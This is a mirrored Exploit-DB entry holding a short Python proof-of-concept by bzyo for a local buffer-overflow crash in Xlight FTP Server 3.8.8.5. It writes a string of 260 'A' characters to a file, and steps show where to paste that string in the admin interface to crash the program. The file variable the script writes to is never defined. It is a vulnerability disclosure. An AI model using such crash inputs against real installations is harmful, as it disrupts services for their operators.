Xlight FTP Server – Buffer Overflow (PoC)

  • 作者: bzyo
    日期: 2017-11-07
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/43135/
  • #!/usr/bin/python
    # Exploit Author: bzyo
    # Twitter: @bzyo_
    # Exploit Title: Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)
    # Date: 07-11-2017
    # Vulnerable Software: Xlight FTP Server v3.8.8.5 (x86/x64)
    # Vendor Homepage: http://www.xlightftpd.com/
    # Version: v3.8.8.5 (x86/x64)
    # Software Link: http://www.xlightftpd.com/download/
    # Tested On: Windows 7 x64
    # PoC: generate crash.txt, copy contents to clipboard, paste in any of the vulnerable fields
    # 1. Generate crash.txt, open, and copy contents to clipboard
    # 2. In Xlight Server, open Global Options > Log > Session Log - Advanced Options > Setup
    # 3. Select Filtering log by users > Setup 
    # 4. Add User
    # 5. Paste crash.txt contents
    # 6. Application crashes
    # Additional vulnerable fields:
    # Global Options > Log > Session Log - Advanced Options > Setup > Filtering log by groups > Setup > Add Group
    # Virtual Server > Modify Virtual Server Configuration > Advanced > Misc > Execute a program after user logged in > Setup
    crash = "A"*260		#crashes on 260 for x86, but more will do
    #crash64 = "A"*272		#crashes on 272 for x64, but more will do
    writeFile = open (file, "w")
    writeFile.write( crash )
    #writeFile.write( crash64 )